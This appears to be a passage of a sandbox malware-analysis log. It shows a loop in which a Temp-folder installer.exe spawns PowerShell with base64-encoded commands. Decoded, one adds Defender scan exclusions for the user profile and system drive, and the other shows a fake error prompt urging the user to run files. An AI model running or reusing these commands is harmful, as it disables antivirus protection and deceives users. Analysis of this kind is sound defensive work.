        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        161⤵
        
        PID:9876
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        161⤵
        
        PID:10452
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        162⤵
        
        PID:10352
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        162⤵
        
        PID:10664
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        162⤵
        
        PID:10644
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        163⤵
        
        PID:10700
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        163⤵
        
        PID:10952
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        163⤵
        
        PID:10388
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        164⤵
        
        PID:11180
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        164⤵
        
        PID:11036
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        164⤵
        
        PID:10940
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        165⤵
        
        PID:10200
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        165⤵
        
        PID:10356
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        165⤵
        
        PID:10252
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        166⤵
        
        PID:11172
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        166⤵
        
        PID:10872
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        166⤵
        System Location Discovery: System Language Discovery
        
        PID:10236
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        167⤵
        
        PID:10596
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        167⤵
        
        PID:10940
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        167⤵
        
        PID:9960
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        168⤵
        
        PID:9408
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        168⤵
        
        PID:10592
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        168⤵
        
        PID:10720
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        169⤵
        
        PID:10260
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        169⤵
        
        PID:10156
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        169⤵
        
        PID:10916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        170⤵
        
        PID:10464
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        170⤵
        
        PID:10536
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        170⤵
        
        PID:11120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        171⤵
        System Location Discovery: System Language Discovery
        
        PID:10304
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        171⤵
        
        PID:9868
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        171⤵
        
        PID:10796
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        172⤵
        
        PID:10592
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        172⤵
        
        PID:10988
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        172⤵
        System Location Discovery: System Language Discovery
        
        PID:11012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        173⤵
        
        PID:10944
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        173⤵
        
        PID:10948
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        173⤵
        
        PID:11324
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        174⤵
        
        PID:11424
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        174⤵
        
        PID:11460
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        174⤵
        
        PID:11660
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        175⤵
        
        PID:11716
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        175⤵
        
        PID:11748
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        175⤵
        
        PID:11812
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        176⤵
        
        PID:11872
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        176⤵
        
        PID:11908
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        176⤵
        
        PID:11948
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
